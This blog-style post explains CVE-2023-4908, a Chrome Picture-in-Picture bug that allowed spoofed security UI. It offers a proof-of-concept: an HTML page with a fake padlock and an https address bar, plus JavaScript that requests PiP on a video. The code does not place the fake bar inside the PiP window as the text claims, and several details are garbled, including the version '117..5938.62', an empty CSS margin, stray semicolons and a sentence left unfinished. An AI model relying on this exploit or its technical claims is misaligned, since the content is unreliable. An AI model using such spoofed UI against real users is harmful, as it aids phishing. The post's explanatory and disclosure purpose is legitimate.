Chrome is one of the world’s most secure browsers, but sometimes a small mistake can open the door to tricky attacks. This is exactly what happened with CVE-2023-4908. In this post, we’ll take a simple look at what went wrong, walk through an example exploit, and talk about why it matters — even though Google rated this vulnerability as "Low" severity.

What Is CVE-2023-4908?

This is a security bug found in Google Chrome's Picture-in-Picture (PiP) feature. Picture-in-Picture lets you pop out a video or other supported content into a floating window that stays visible while you browse other tabs. Chrome versions before 117..5938.62 had this issue.

The vulnerability allowed a remote attacker to trick users with a spoofed security UI — that’s things like fake "lock" icons or address bars — using a specially crafted HTML page. That could mislead users about what site they’re really on or whether their connection is secure.

How Did It Happen?

The core of the problem is how Chrome handled content shown in Picture-in-Picture windows. Chrome didn’t properly restrict what kind of UI elements could be shown in a PiP window. This means a website could use a tailored HTML page to draw fake browser security indicators, like padlocks or address bars, inside a Picture-in-Picture window.

If a site convinced a user to pop out a PiP window, it could make the user think they’re interacting with a safe part of Chrome when they’re really just seeing a regular web page in disguise. This opens up possibilities for phishing attacks.

Exploit Details With Example

Let’s walk through a simple proof-of-concept exploit to see how it works. Assume we're an attacker and want to make a fake security UI, say, a green padlock and an https address bar, appear inside a PiP window.

Example HTML: Fake Security UI

<!DOCTYPE html>
<html>
<head>
  <title>Fake Secure PiP</title>
  <style>
    body {
      margin: ; 
      background: #fff;
    }
    #fake-bar {
      display: flex;
      align-items: center;
      background-color: #f5f5f5;
      padding: 10px;
      font-family: Arial, sans-serif;
      border-bottom: 1px solid #ccc;
    }
    #lock {
      color: green;
      font-size: 20px;
      margin-right: 10px;
    }
    #address {
      font-size: 16px;
      color: #222;
    }
  </style>
</head>
<body>
  <div id="fake-bar">
    <span id="lock">&#128274;</span>
    <span id="address">https://secure-login.example.com</span>;
  </div>
  <h3>This is a harmless PiP window... or is it?</h3>
</body>
</html>

JavaScript to Request PiP

// Assume there's a video element (could be hidden or tiny)
const video = document.createElement('video');
video.src = "https://sample-videos.com/video123/mp4/240/big_buck_bunny_240p_1mb.mp4";;
video.autoplay = true;
video.muted = true;
document.body.appendChild(video);

video.addEventListener('loadeddata', () => {
    if (document.pictureInPictureEnabled) {
        video.requestPictureInPicture().then(pipWindow => {
            // The fake bar is visible in PiP window alongside the video
        });
    }
});

By overlaying HTML elements (the fake security UI) above a minimized video, and calling requestPictureInPicture(), a PiP window can be shown to the user. This window will have the fake padlock and https address, tricking the user into trusting it as a real Chrome security element.

Why This Works

Older Chrome versions didn't restrict what could be drawn in a PiP window. With a bit of creativity, websites could show anything — even elements that look like browser or OS interfaces.

What’s the Risk?

Severity: The Chromium team classified this bug as “Low severity.” That's mostly because an attacker still needs to convince the user to open a PiP window, and PiP is not commonly used for critical interactions. Also, most users would only see this if they intentionally interacted with a site pushing them toward the exploit.

Fix and References

Google fixed this bug in Chrome version 117..5938.62. The fix was to limit what type of content can be drawn in PiP windows – basically, cutting off the website’s ability to make the PiP window look like part of the browser UI.

References

- Chromium Security Advisories
- CVE-2023-4908 - NIST Details
- Chromium Bug Tracker (Example PiP Bug)

TL;DR

CVE-2023-4908 let websites draw fake security UI elements in Chrome PiP windows, opening up mild phishing risks. Chrome fixed the bug in version 117 — so update your browser!

If you are a web developer or a security-conscious user:

Timeline

Published on: 09/12/2023 21:15:09 UTC
Last modified on: 10/17/2023 20:02:51 UTC